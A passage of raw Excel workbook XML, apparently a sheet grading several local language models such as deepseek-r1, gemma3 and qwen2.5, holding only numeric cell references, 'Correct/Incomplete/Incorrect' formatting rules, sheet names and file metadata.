        <v>29</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F7" s="3"/>
      <c r="G7" s="3"/>
    </row>
    <row r="8" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>106</v>
      </c>
      <c r="G8" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C8">
    <cfRule type="cellIs" dxfId="29" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="28" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="27" priority="3" operator="equal">
      <formula>"Incorrect"</formula>
    </cfRule>
  </conditionalFormatting>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
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="35" customWidth="1"/>
    <col min="2" max="2" width="25" customWidth="1"/>
    <col min="3" max="3" width="15" customWidth="1"/>
    <col min="4" max="4" width="60" customWidth="1"/>
    <col min="5" max="7" width="80" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="2" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>107</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>108</v>
      </c>
      <c r="G2" s="3"/>
    </row>
    <row r="3" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>107</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>109</v>
      </c>
      <c r="G3" s="3"/>
    </row>
    <row r="4" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>107</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>110</v>
      </c>
      <c r="G4" s="3"/>
    </row>
    <row r="5" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>107</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>111</v>
      </c>
      <c r="G5" s="3"/>
    </row>
    <row r="6" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>107</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>112</v>
      </c>
      <c r="G6" s="3"/>
    </row>
    <row r="7" spans="1:7" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>107</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>113</v>
      </c>
      <c r="G7" s="3"/>
    </row>
    <row r="8" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>107</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>114</v>
      </c>
      <c r="G8" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C8">
    <cfRule type="cellIs" dxfId="26" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="25" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="24" priority="3" operator="equal">
      <formula>"Incorrect"</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17</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="17" baseType="lpstr">
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Dashboard</vt:lpstr>
      <vt:lpstr>deepseek-r1</vt:lpstr>
      <vt:lpstr>gemma3</vt:lpstr>
      <vt:lpstr>gemma3n</vt:lpstr>
      <vt:lpstr>granite3-dense</vt:lpstr>
      <vt:lpstr>granite3.2</vt:lpstr>
      <vt:lpstr>lily_cyber</vt:lpstr>
      <vt:lpstr>llama3</vt:lpstr>
      <vt:lpstr>llama3.2</vt:lpstr>
      <vt:lpstr>mistral</vt:lpstr>
      <vt:lpstr>nomic-embed-text</vt:lpstr>
      <vt:lpstr>phi3</vt:lpstr>
      <vt:lpstr>phi4-mini</vt:lpstr>
      <vt:lpstr>phi4-mini-reasoning</vt:lpstr>
      <vt:lpstr>qwen2.5</vt:lpstr>
      <vt:lpstr>qwen3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Paulo Ribeiro</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-18T11:32:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-18T14:01:11Z</dcterms:modified>
</cp:coreProperties>
</file>